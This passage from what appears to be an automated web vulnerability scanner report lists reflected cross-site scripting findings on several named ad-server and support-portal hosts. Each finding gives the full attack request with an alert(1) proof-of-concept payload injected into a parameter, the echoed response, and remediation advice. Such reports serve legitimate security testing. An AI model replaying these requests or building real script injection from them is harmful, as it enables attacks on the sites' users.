Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Tue, 01 Nov 2011 02:16:05 GMT
Content-Type: text/html
Content-Length: 1393
Cache-Control: private, max-age=0, no-cache
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><base target="_top" /><script type="text/javascript">setTimeout('window.location.replace("http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36824&cb=INSERT_RANDOM_NUMBER_HEREcb9af'-alert(1)-'8c83aaf82f3&rd=60&rm=25&rc=11")', 60*1000);</script>
...[SNIP]...

3.57. http://mediaservices-d.openxenterprise.com/w/1.0/afr [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mediaservices-d.openxenterprise.com
Path:   /w/1.0/afr

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dce2b'-alert(1)-'e933e1773f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /w/1.0/afr?auid=36824&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=25&dce2b'-alert(1)-'e933e1773f2=1 HTTP/1.1
Host: mediaservices-d.openxenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediaservices-d.openxenterprise.com/w/1.0/afr?mi=fbe566bc-e601-4d14-a2ef-601df1907cf9&mn=0&mc=1&cc=1&auid=36821&cb=39316621
Cookie: OX_u=c3d1518f-d235-7c24-90da-5525c6a44dce_m

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: OX_u=c3d1518f-d235-7c24-90da-5525c6a44dce_m; Version=1; Expires=Wed, 31 Oct 2012 02:18:25 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.8.1 (participate in the frantic)
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Tue, 01 Nov 2011 02:18:25 GMT
Content-Type: text/html
Content-Length: 2435
Cache-Control: private, max-age=0, no-cache
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><base target="_top" /><script type="text/javascript">setTimeout('window.location.replace("http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36824&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=25&dce2b'-alert(1)-'e933e1773f2=1&rc=11")', 60*1000);</script>
...[SNIP]...

3.58. http://mediaservices-d.openxenterprise.com/w/1.0/afr [rm parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mediaservices-d.openxenterprise.com
Path:   /w/1.0/afr

Issue detail

The value of the rm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b628'-alert(1)-'9b6b7bb68d4 was submitted in the rm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /w/1.0/afr?auid=36824&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=254b628'-alert(1)-'9b6b7bb68d4 HTTP/1.1
Host: mediaservices-d.openxenterprise.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://mediaservices-d.openxenterprise.com/w/1.0/afr?mi=fbe566bc-e601-4d14-a2ef-601df1907cf9&mn=0&mc=1&cc=1&auid=36821&cb=39316621
Cookie: OX_u=c3d1518f-d235-7c24-90da-5525c6a44dce_m

Response (redirected)

HTTP/1.1 200 OK
Set-Cookie: OX_u=c3d1518f-d235-7c24-90da-5525c6a44dce_m; Version=1; Expires=Wed, 31 Oct 2012 02:17:13 GMT; Max-Age=31536000; Path=/
Server: MochiWeb/1.1 WebMachine/1.8.1 (participate in the frantic)
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Date: Tue, 01 Nov 2011 02:17:13 GMT
Content-Type: text/html
Content-Length: 1393
Cache-Control: private, max-age=0, no-cache
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><base target="_top" /><script type="text/javascript">setTimeout('window.location.replace("http://mediaservices-d.openxenterprise.com/w/1.0/afr?auid=36824&cb=INSERT_RANDOM_NUMBER_HERE&rd=60&rm=254b628'-alert(1)-'9b6b7bb68d4&rc=11")', 60*1000);</script>
...[SNIP]...

3.59. https://portal.teamsupport.com/Telerik.Web.UI.WebResource.axd [_TSM_HiddenField_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://portal.teamsupport.com
Path:   /Telerik.Web.UI.WebResource.axd

Issue detail

The value of the _TSM_HiddenField_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5e01'%3balert(1)//6c699322ab6 was submitted in the _TSM_HiddenField_ parameter. This input was echoed as c5e01';alert(1)//6c699322ab6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Telerik.Web.UI.WebResource.axd?_TSM_HiddenField_=RadScriptManager1_HiddenFieldc5e01'%3balert(1)//6c699322ab6&compress=1&_TSM_CombinedScripts_=%3b%3bSystem.Web.Extensions%2c+Version%3d3.5.0.0%2c+Culture%3dneutral%2c+PublicKeyToken%3d31bf3856ad364e35%3aen-US%3afec40ae8-2c1f-4db6-96ca-d6c61af2dc7f%3aea597d4b%3ab25378d2%3bTelerik.Web.UI%2c+Version%3d2008.3.1314.35%2c+Culture%3dneutral%2c+PublicKeyToken%3d121fae78165ba3d4%3aen-US%3aef502ffb-86f7-4d96-ad3a-fbb934d602ab%3a16e4e7cd%3a68f76a79%3a874f8ea2%3a2a2fc429%3aa585d0d4 HTTP/1.1
Host: portal.teamsupport.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://portal.teamsupport.com/BasicPortal.aspx?OrganizationID=305383
Cookie: ASP.NET_SessionId=q5cuoojovmirb4451hesgsbt

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Length: 241912
Content-Type: application/x-javascript
Expires: Tue, 30 Oct 2012 19:14:44 GMT
Last-Modified: Fri, 16 Sep 2011 17:57:43 GMT
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR CUR TAI PSA IVA IVD HIS OUR DEL SAM OTR UNR STP UNI"
Date: Mon, 31 Oct 2011 19:14:43 GMT

/* START MicrosoftAjax.js */
//----------------------------------------------------------
// Copyright (C) Microsoft Corporation. All rights reserved.
//--------------------------------------------
...[SNIP]...
Control);


/* END Telerik.Web.UI.Upload.RadUpload.js */
if(typeof(Sys)!=='undefined')Sys.Application.notifyScriptLoaded();
(function() {var fn = function() {if(!$get('RadScriptManager1_HiddenFieldc5e01';alert(1)//6c699322ab6')) return; $get('RadScriptManager1_HiddenFieldc5e01';alert(1)//6c699322ab6').value += ';;System.Web.Extensions, Version=3.5.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35:en-US:fec40ae8-2c1f-4d
...[SNIP]...

3.60. http://showadsak.pubmatic.com/AdServer/AdServerServlet [frameName parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 12df5'-alert(1)-'78a7bb69b97 was submitted in the frameName parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27180&siteId=27181&adId=22456&kadwidth=728&kadheight=90&kbgColor=686C6F&ktextColor=171717&klinkColor=004276&pageURL=http://www.politico.com/&frameName=http_www_politico_comkomli_ads_frame1271802718112df5'-alert(1)-'78a7bb69b97&kltstamp=2011-9-31%2020%3A28%3A51&ranreq=0.7080080761587771&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=25x549&adVisibility=3 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: KRTBCOOKIE_100=4065-y9dly9jlztlwn; PUBRETARGET=2114_1327977633.82_1407375680.461_1407376052.78_1408030145.390_1321207886.1553_1410878111.806_1347381745.2404_1335025436; KRTBCOOKIE_22=488-pcv:1|uid:3827355846744503244; KRTBCOOKIE_32=1386-WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA%3D%3D; KRTBCOOKIE_57=476-uid:2230616255569715877; PUBMDCID=1; KADUSERCOOKIE=9E293B5B-EC08-48B0-9EB4-B19C8654FBE6; KRTBCOOKIE_80=1336-30ca355a-b54e-4ba3-ac44-7046f2c4ef85.; KRTBCOOKIE_148=1699-uid:439524AE9E11374EB2C0C71740C604; KRTBCOOKIE_53=424-f4ed396e-81e1-46ef-82e5-3c1d998c2fa0; PMAT=0; KRTBCOOKIE_89=4485-uid:ABJeb1_ZsvoMkSDqqlTuxjqemm6tC_Mb1oaofvaW1kegGSGtSCgyAiueAoqRVIIuCR4iLDkL9aYyBbywYlblrxDoJVWM--ho-A

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1795
Date: Tue, 01 Nov 2011 01:29:28 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Wed, 31-Oct-2012 01:29:27 GMT; path=/
Set-Cookie: pubfreq_27181_22456_1169761361=165-1; domain=pubmatic.com; expires=Tue, 01-Nov-2011 02:09:28 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Wed, 02-Nov-2011 01:29:28 GMT; path=/

document.write('<div id="http_www_politico_comkomli_ads_frame1271802718112df5'-alert(1)-'78a7bb69b97" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=LGoAAC1qAAC4VwAAAAAAAAAAAAAAAAAAAAAAAAAAAABqeAAApQAAANgCAABaAAAABwAAAAAAAAAAAAAAAQAAADlFMjkzQjV
...[SNIP]...

3.61. http://showadsak.pubmatic.com/AdServer/AdServerServlet [pageURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93091'-alert(1)-'e25b469b5fe was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27180&siteId=27181&adId=22456&kadwidth=728&kadheight=90&kbgColor=686C6F&ktextColor=171717&klinkColor=004276&pageURL=http://www.politico.com/93091'-alert(1)-'e25b469b5fe&frameName=http_www_politico_comkomli_ads_frame12718027181&kltstamp=2011-9-31%2020%3A28%3A51&ranreq=0.7080080761587771&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=25x549&adVisibility=3 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: KRTBCOOKIE_100=4065-y9dly9jlztlwn; PUBRETARGET=2114_1327977633.82_1407375680.461_1407376052.78_1408030145.390_1321207886.1553_1410878111.806_1347381745.2404_1335025436; KRTBCOOKIE_22=488-pcv:1|uid:3827355846744503244; KRTBCOOKIE_32=1386-WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA%3D%3D; KRTBCOOKIE_57=476-uid:2230616255569715877; PUBMDCID=1; KADUSERCOOKIE=9E293B5B-EC08-48B0-9EB4-B19C8654FBE6; KRTBCOOKIE_80=1336-30ca355a-b54e-4ba3-ac44-7046f2c4ef85.; KRTBCOOKIE_148=1699-uid:439524AE9E11374EB2C0C71740C604; KRTBCOOKIE_53=424-f4ed396e-81e1-46ef-82e5-3c1d998c2fa0; PMAT=0; KRTBCOOKIE_89=4485-uid:ABJeb1_ZsvoMkSDqqlTuxjqemm6tC_Mb1oaofvaW1kegGSGtSCgyAiueAoqRVIIuCR4iLDkL9aYyBbywYlblrxDoJVWM--ho-A

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.8e-fips-rhel5 mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1795
Date: Tue, 01 Nov 2011 01:29:26 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Wed, 31-Oct-2012 01:29:25 GMT; path=/
Set-Cookie: pubfreq_27181_22456_76087372=165-1; domain=pubmatic.com; expires=Tue, 01-Nov-2011 02:09:26 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Wed, 02-Nov-2011 01:29:26 GMT; path=/

document.write('<div id="http_www_politico_comkomli_ads_frame12718027181" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=LGoAAC1qAAC4VwAAAAAAAA
...[SNIP]...
mtpfact=0.000000&kadNetFrequecy=3&kadwidth=728&kadheight=90&kadsizeid=7&kltstamp=1320110966&indirectAdId=30826&adServerOptimizerId=1&ranreq=0.7080080761587771&imprCap=1&pageURL=http://www.politico.com/93091'-alert(1)-'e25b469b5fe">
...[SNIP]...

3.62. http://showadsak.pubmatic.com/AdServer/AdServerServlet [ranreq parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://showadsak.pubmatic.com
Path:   /AdServer/AdServerServlet

Issue detail

The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f8323'-alert(1)-'c4592e9428f was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AdServer/AdServerServlet?operId=2&pubId=27180&siteId=27181&adId=22456&kadwidth=728&kadheight=90&kbgColor=686C6F&ktextColor=171717&klinkColor=004276&pageURL=http://www.politico.com/&frameName=http_www_politico_comkomli_ads_frame12718027181&kltstamp=2011-9-31%2020%3A28%3A51&ranreq=0.7080080761587771f8323'-alert(1)-'c4592e9428f&timezone=-5&screenResolution=1920x1200&inIframe=0&adPosition=25x549&adVisibility=3 HTTP/1.1
Host: showadsak.pubmatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: KRTBCOOKIE_100=4065-y9dly9jlztlwn; PUBRETARGET=2114_1327977633.82_1407375680.461_1407376052.78_1408030145.390_1321207886.1553_1410878111.806_1347381745.2404_1335025436; KRTBCOOKIE_22=488-pcv:1|uid:3827355846744503244; KRTBCOOKIE_32=1386-WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA%3D%3D; KRTBCOOKIE_57=476-uid:2230616255569715877; PUBMDCID=1; KADUSERCOOKIE=9E293B5B-EC08-48B0-9EB4-B19C8654FBE6; KRTBCOOKIE_80=1336-30ca355a-b54e-4ba3-ac44-7046f2c4ef85.; KRTBCOOKIE_148=1699-uid:439524AE9E11374EB2C0C71740C604; KRTBCOOKIE_53=424-f4ed396e-81e1-46ef-82e5-3c1d998c2fa0; PMAT=0; KRTBCOOKIE_89=4485-uid:ABJeb1_ZsvoMkSDqqlTuxjqemm6tC_Mb1oaofvaW1kegGSGtSCgyAiueAoqRVIIuCR4iLDkL9aYyBbywYlblrxDoJVWM--ho-A

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix) DAV/2 mod_ssl/2.2.4 OpenSSL/0.9.7a mod_fastcgi/2.4.2
Vary: Accept-Encoding
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Content-Type: text/html
Content-Length: 1791
Date: Tue, 01 Nov 2011 01:29:31 GMT
Connection: close
Set-Cookie: PUBMDCID=1; domain=pubmatic.com; expires=Wed, 31-Oct-2012 01:29:30 GMT; path=/
Set-Cookie: pubfreq_27181_22456_38660990=165-1; domain=pubmatic.com; expires=Tue, 01-Nov-2011 02:09:31 GMT; path=/
Set-Cookie: PMDTSHR=cat:; domain=pubmatic.com; expires=Wed, 02-Nov-2011 01:29:31 GMT; path=/

document.write('<div id="http_www_politico_comkomli_ads_frame12718027181" style="position: absolute; margin: 0px 0px 0px 0px; height: 0px; width: 0px; top: -10000px; " clickdata=LGoAAC1qAAC4VwAAAAAAAA
...[SNIP]...
Id=22456&adServerId=165&kefact=0.800000&kpbmtpfact=0.000000&kadNetFrequecy=3&kadwidth=728&kadheight=90&kadsizeid=7&kltstamp=1320110971&indirectAdId=30826&adServerOptimizerId=1&ranreq=0.7080080761587771f8323'-alert(1)-'c4592e9428f&imprCap=1&pageURL=http://www.politico.com/">
...[SNIP]...

3.63. http://tag.contextweb.com/TagPublish/getjs.aspx [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the action request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7266"%3balert(1)//5bb8f1d904 was submitted in the action parameter. This input was echoed as b7266";alert(1)//5bb8f1d904 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWADb7266"%3balert(1)//5bb8f1d904&cwrun=200&cwadformat=728X90&cwpid=536454&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101928&publisherID=1822&siteID=16543 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: V=ZZVrXBMk1mFi; cwbh1=1914%3B11%2F30%2F2011%3BHWHH1%3B11%2F30%2F2011%3BHOTR1%0A553%3B11%2F24%2F2011%3BMIWO2; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|530741.f4ed396e-81e1-46ef-82e5-3c1d998c2fa0.0|531399.gl99ih0j0xqn.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|535461.3827355846744503244.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; FC1-WC=53620_1_3Fx7C^58321_1_3Fx7H^58444_2_3Fx8b^59835_1_3Fxei^58199_1_3Fxeq; FC1-WCR=126997_1_3HHYZ; FC1-PC=58497_3FbP1; C2W4=0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP205
Last-Modified: Tue, 25 Oct 02011 16:23:13 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 01 Nov 2011 01:29:09 GMT
Content-Length: 8863
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 04:15:49 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536454";var cwtagid="101928";var cwadformat="728X90";var ca="VIEWADb7266";alert(1)//5bb8f1d904";var cr="200";var cw="728";var ch="90";var cads="0";var cp="536454";var ct="101928";var cf="728X90";var cn="1";var epid="1822";var esid="16543";

       String.prototype.cwcontains = function(s) {
           retur
...[SNIP]...

3.64. http://tag.contextweb.com/TagPublish/getjs.aspx [cwadformat parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwadformat request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee865"%3balert(1)//09abc2650ba was submitted in the cwadformat parameter. This input was echoed as ee865";alert(1)//09abc2650ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90ee865"%3balert(1)//09abc2650ba&cwpid=536454&cwwidth=728&cwheight=90&cwpnet=1&cwtagid=101928&publisherID=1822&siteID=16543 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
Cookie: V=ZZVrXBMk1mFi; cwbh1=1914%3B11%2F30%2F2011%3BHWHH1%3B11%2F30%2F2011%3BHOTR1%0A553%3B11%2F24%2F2011%3BMIWO2; pb_rtb_ev="1:530739.4e394470-3e17-879f-6d77-411115d4b5ad.0|537583.9ce25df1-8701-4684-948e-35b3d6998d9a.0|530912.WX9qZVd2TXVEBmNeAQZyXAJQaXsQdAFBDFlpVVFOYA==.0|536088.2040695539456590.0|534889.y9dly9jlztlwn.0|535495.7ef581ac-c15f-11e0-b71a-00259009a9e4.0|534301.04b10af1-b730-4018-9aca-0ef231c6c059.0|530741.f4ed396e-81e1-46ef-82e5-3c1d998c2fa0.0|531399.gl99ih0j0xqn.0|535039.0adf278a-5c84-4e01-8d4e-00e9b3c85ea1.0|538064.6731d4ad-7dae-4402-b507-a0bc233d79fb.0|531292.BO-00000000521444319.0|535461.3827355846744503244.0|537085.439524AE9E11374EB2C0C71740C604.0|538303.x.0|538569.776b70d9-5df4-4d1b-98af-982dd1709cac.0"; FC1-WC=53620_1_3Fx7C^58321_1_3Fx7H^58444_2_3Fx8b^59835_1_3Fxei^58199_1_3Fxeq; FC1-WCR=126997_1_3HHYZ; FC1-PC=58497_3FbP1; C2W4=0

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP202
Last-Modified: Tue, 25 Oct 02011 16:16:07 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 01 Nov 2011 01:29:11 GMT
Content-Length: 8892
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 01-Nov-2011 04:15:51 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="536454";var cwtagid="101928";var cwadformat="728X90ee865";alert(1)//09abc2650ba";var ca="VIEWAD";var cr="200";var cw="728";var ch="90";var cads="0";var cp="536454";var ct="101928";var cf="728X90ee865";alert(1)//09abc2650ba";var cn="1";var epid="1822";var esid="16543";

       String.p
...[SNIP]...

3.65. http://tag.contextweb.com/TagPublish/getjs.aspx [cwheight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwheight request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 924a2"%3balert(1)//97f0af79fc5 was submitted in the cwheight parameter. This input was echoed as 924a2";alert(1)//97f0af79fc5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=728X90&cwpid=536454&cwwidth=728&cwheight=90924a2"%3balert(1)//97f0af79fc5&cwpnet=1&cwtagid=101928&publisherID=1822&siteID=16543 HTTP/1.1
Host: tag.contextweb.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.politico.com/
